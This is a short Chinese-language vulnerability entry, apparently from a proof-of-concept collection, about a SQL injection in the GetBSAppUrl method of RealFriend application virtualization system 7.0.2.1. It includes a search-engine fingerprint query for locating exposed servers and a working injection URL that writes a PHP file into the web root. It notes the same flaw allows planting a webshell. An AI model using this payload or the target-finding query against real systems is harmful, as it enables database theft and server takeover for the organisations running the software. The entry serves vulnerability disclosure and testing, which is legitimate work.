# 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞

## 漏洞描述

瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞，由于参数传入没有进行过滤导致存在SQL注入，攻击者通过漏洞可以获取数据库敏感信息

## 漏洞影响

```
瑞友应用虚拟化系统 7.0.2.1
```

## 网络测绘

```
"CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统"
```

## 漏洞复现

登陆页面

![image-20230417100516425](images/image-20230417100516425.png)

在 GetBSAppUrl 方法中存在SQL注入漏洞，通过漏洞可以写入Webshell文件

![image-20230417100529493](images/image-20230417100529493.png)

验证POC

```
/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123
```

![image-20230417100544162](images/image-20230417100544162.png)

```
/test7.php
```

![image-20230417100554583](images/image-20230417100554583.png)